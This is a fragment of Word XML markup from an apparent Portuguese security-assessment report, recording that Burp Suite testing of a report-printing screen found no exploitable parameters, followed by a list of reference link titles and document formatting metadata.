        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544191B" w14:textId="77777777" w:rsidR="00C37DA7" w:rsidRPr="004D4181" w:rsidRDefault="00C37DA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083DABA" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00874975" w:rsidP="00874975">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">De acordo com os dados capturados através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a página não recebe nenhum parâmetro manipulável para realizar a requisição no momento em que um relatório é impresso. Dessa forma, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6AFB12" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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C2EB1CA" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16675A77" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181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6065708" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46EF" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr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2">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C45928B" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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3" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId44"/>
    </w:p>
    <w:p w14:paraId="6413A0A8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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5" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>NTP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="600735C8" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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6" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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NetBios</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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14:paraId="0FA710F3" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17420535" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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8" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5ACE8E4E" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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9" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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w3c</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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 xml:space="preserve"> - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41362E30" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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0" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5696B7D6" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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1" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F1762C2" w14:textId="77777777" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="004D4181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Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F349A65" w14:textId="77777777" w:rsidR="00BC5DD9" w:rsidRPr="004D4181" w:rsidRDefault="00EE46E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bCs/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="00BC5DD9" w:rsidRPr="004D4181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L2TP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50140083" w14:textId="77777777"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A648A1E" w14:textId="77777777"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E136348" w14:textId="77777777" w:rsidR="00DB70B5" w:rsidRPr="00F15F82" w:rsidRDefault="00DB70B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DB70B5" w:rsidRPr="00F15F82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BFC8DC" w15:done="0"/>
  <w15:commentEx w15:paraId="29207E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8617C" w14:textId="77777777" w:rsidR="005809A5" w:rsidRDefault="005809A5" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B03A750" w14:textId="77777777" w:rsidR="005809A5" w:rsidRDefault="005809A5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CDF1F" w14:textId="77777777" w:rsidR="005809A5" w:rsidRDefault="005809A5" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4197FFA9" w14:textId="77777777" w:rsidR="005809A5" w:rsidRDefault="005809A5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47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6" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4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5">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54CA3D7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>
    <w:nsid w:val="12F9106D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8">
    <w:nsid w:val="13CD4C22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DF268C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7F7571"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6C8BDD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255976AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29E22E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8100E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09FAFD9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B093F67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47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6" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="2C8934BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A4817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3B67193B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0068ED2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3B990FE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2932B0B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203DCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EEE03F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-268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5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3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23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0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9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952" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22">
    <w:nsid w:val="42E80FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3AF6411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4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5">
    <w:nsid w:val="45963F03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11705EF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281BF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2C8E5A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8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2">
    <w:nsid w:val="60252509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D21966"/>
    <w:lvl w:ilvl="0" w:tplc="C8F4D2F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571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F0A1872"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8FE87B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4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>
    <w:nsid w:val="71616484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36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7">
    <w:nsid w:val="7322209E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25EAE6DE"/>
    <w:lvl w:ilvl="0" w:tplc="44CE1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14989"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="806C3E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9853A0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40">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A14DB52"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3573" w:hanging="525"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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37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12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1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8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48" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41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31"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="29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30"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="7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s Costa">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="e591655a8b03cc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062FF"/>
    <w:rsid w:val="00013EA5"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="0001600C"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="000355DC"/>
    <w:rsid w:val="00036A5D"/>
    <w:rsid w:val="00036F84"/>
    <w:rsid w:val="000416E5"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="00052A31"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="0005686A"/>
    <w:rsid w:val="00057B33"/>
    <w:rsid w:val="00065E32"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00073AC1"/>
    <w:rsid w:val="00087FBC"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000A57C9"/>
    <w:rsid w:val="000A6729"/>
    <w:rsid w:val="000A7CF1"/>
    <w:rsid w:val="000B154D"/>
    <w:rsid w:val="000C051E"/>
    <w:rsid w:val="000C4BC3"/>
    <w:rsid w:val="000C72B3"/>
    <w:rsid w:val="000D038A"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000D4E90"/>
    <w:rsid w:val="000D5C45"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E2EE2"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="000F4CD1"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001124EF"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="00136AE5"/>
    <w:rsid w:val="001557DC"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="00166FEA"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00171C6D"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00184BA7"/>
    <w:rsid w:val="00185392"/>
    <w:rsid w:val="00185A92"/>
    <w:rsid w:val="00185ED4"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001923D7"/>
    <w:rsid w:val="0019637C"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="00197C78"/>
    <w:rsid w:val="001A1CBE"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001A5DFB"/>
    <w:rsid w:val="001B2A0B"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="001D6374"/>
    <w:rsid w:val="001E28D1"/>
    <w:rsid w:val="001E29F7"/>
    <w:rsid w:val="001E6279"/>
    <w:rsid w:val="001E710F"/>
    <w:rsid w:val="001F4C0E"/>
    <w:rsid w:val="001F5050"/>
    <w:rsid w:val="001F6642"/>
    <w:rsid w:val="00201E30"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="0020416E"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="00211EF9"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00225158"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="00240857"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="0024453B"/>
    <w:rsid w:val="002643BE"/>
    <w:rsid w:val="00265100"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00284BB3"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="00296685"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002A5945"/>
    <w:rsid w:val="002A5CE5"/>
    <w:rsid w:val="002B1EF3"/>
    <w:rsid w:val="002C07B9"/>
    <w:rsid w:val="002C0836"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D16A4"/>
    <w:rsid w:val="002D18C2"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002D3D74"/>
    <w:rsid w:val="002D4365"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="002F76CD"/>
    <w:rsid w:val="0030231A"/>
    <w:rsid w:val="00310663"/>
    <w:rsid w:val="00310E6C"/>
    <w:rsid w:val="00311F69"/>
    <w:rsid w:val="00313924"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="003178EE"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="003243CE"/>
    <w:rsid w:val="003249F0"/>
    <w:rsid w:val="00332122"/>
    <w:rsid w:val="00335763"/>
    <w:rsid w:val="0033600A"/>
    <w:rsid w:val="0033639F"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="00347954"/>
    <w:rsid w:val="00352313"/>
    <w:rsid w:val="00361C8E"/>
    <w:rsid w:val="0036432A"/>
    <w:rsid w:val="003745C8"/>
    <w:rsid w:val="00384949"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A3B54"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003B06CC"/>
    <w:rsid w:val="003B3BB8"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003D23F9"/>
    <w:rsid w:val="003D4E1D"/>
    <w:rsid w:val="003E00BD"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E4BBF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F0DBB"/>
    <w:rsid w:val="003F1C5E"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F40A0"/>
    <w:rsid w:val="003F4807"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="003F64B7"/>
    <w:rsid w:val="0040058D"/>
    <w:rsid w:val="004035BE"/>
    <w:rsid w:val="0040482C"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00415B47"/>
    <w:rsid w:val="00417333"/>
    <w:rsid w:val="00417AE8"/>
    <w:rsid w:val="004236F4"/>
    <w:rsid w:val="0043065E"/>
    <w:rsid w:val="00430E45"/>
    <w:rsid w:val="00432597"/>
    <w:rsid w:val="0043674F"/>
    <w:rsid w:val="00441C24"/>
    <w:rsid w:val="004544C9"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0045732E"/>
    <w:rsid w:val="004741DB"/>
    <w:rsid w:val="00477883"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="0048472B"/>
    <w:rsid w:val="004850DA"/>
    <w:rsid w:val="0049098B"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="0049776E"/>
    <w:rsid w:val="004A0BD2"/>
    <w:rsid w:val="004A57AF"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B2991"/>
    <w:rsid w:val="004B38C9"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004D25DD"/>
    <w:rsid w:val="004D4181"/>
    <w:rsid w:val="004E03D0"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E12C9"/>
    <w:rsid w:val="004E1803"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004E5480"/>
    <w:rsid w:val="004F298F"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="00510DD2"/>
    <w:rsid w:val="005135D8"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="005178AE"/>
    <w:rsid w:val="005269EB"/>
    <w:rsid w:val="00527C9A"/>
    <w:rsid w:val="00530877"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00546C53"/>
    <w:rsid w:val="00546F66"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="005678E5"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00570E09"/>
    <w:rsid w:val="00572346"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="005809A5"/>
    <w:rsid w:val="0058247A"/>
    <w:rsid w:val="0058462E"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005967D5"/>
    <w:rsid w:val="005A089C"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005B5243"/>
    <w:rsid w:val="005C42F0"/>
    <w:rsid w:val="005C7184"/>
    <w:rsid w:val="005C728E"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005E239F"/>
    <w:rsid w:val="005E45A3"/>
    <w:rsid w:val="005F159D"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F470B"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="005F79D1"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00605CFE"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00623C1F"/>
    <w:rsid w:val="0062442F"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="00630433"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00640C50"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006515FB"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="00657669"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="00676E62"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006853AA"/>
    <w:rsid w:val="00685A02"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="00695F1C"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006B700D"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C21E3"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D580D"/>
    <w:rsid w:val="006D64E8"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006E2559"/>
    <w:rsid w:val="006F4C5F"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="0070134C"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="007067BC"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00707948"/>
    <w:rsid w:val="00707E1B"/>
    <w:rsid w:val="00711484"/>
    <w:rsid w:val="00713FBD"/>
    <w:rsid w:val="007260B8"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="00737A20"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00743C23"/>
    <w:rsid w:val="00745B49"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00760D9A"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="00763063"/>
    <w:rsid w:val="0076417A"/>
    <w:rsid w:val="007649FC"/>
    <w:rsid w:val="00765ACB"/>
    <w:rsid w:val="00771369"/>
    <w:rsid w:val="00772F19"/>
    <w:rsid w:val="00777DDF"/>
    <w:rsid w:val="007804EC"/>
    <w:rsid w:val="00790D68"/>
    <w:rsid w:val="00790EC9"/>
    <w:rsid w:val="00791E90"/>
    <w:rsid w:val="007952E2"/>
    <w:rsid w:val="007A267D"/>
    <w:rsid w:val="007B299D"/>
    <w:rsid w:val="007B4E84"/>
    <w:rsid w:val="007D094F"/>
    <w:rsid w:val="007D3513"/>
    <w:rsid w:val="007E0AF9"/>
    <w:rsid w:val="007E2011"/>
    <w:rsid w:val="007E2EC4"/>
    <w:rsid w:val="007E3D75"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007E4A6B"/>
    <w:rsid w:val="007F53C1"/>
    <w:rsid w:val="007F5B36"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00801C36"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00807E49"/>
    <w:rsid w:val="008176F3"/>
    <w:rsid w:val="00817857"/>
    <w:rsid w:val="00824DA2"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00827015"/>
    <w:rsid w:val="00830AAF"/>
    <w:rsid w:val="00830E80"/>
    <w:rsid w:val="00831A3E"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="0085362D"/>
    <w:rsid w:val="0085595A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00861DFE"/>
    <w:rsid w:val="00863ADF"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00874975"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="00885145"/>
    <w:rsid w:val="0088539E"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A7473"/>
    <w:rsid w:val="008A79EE"/>
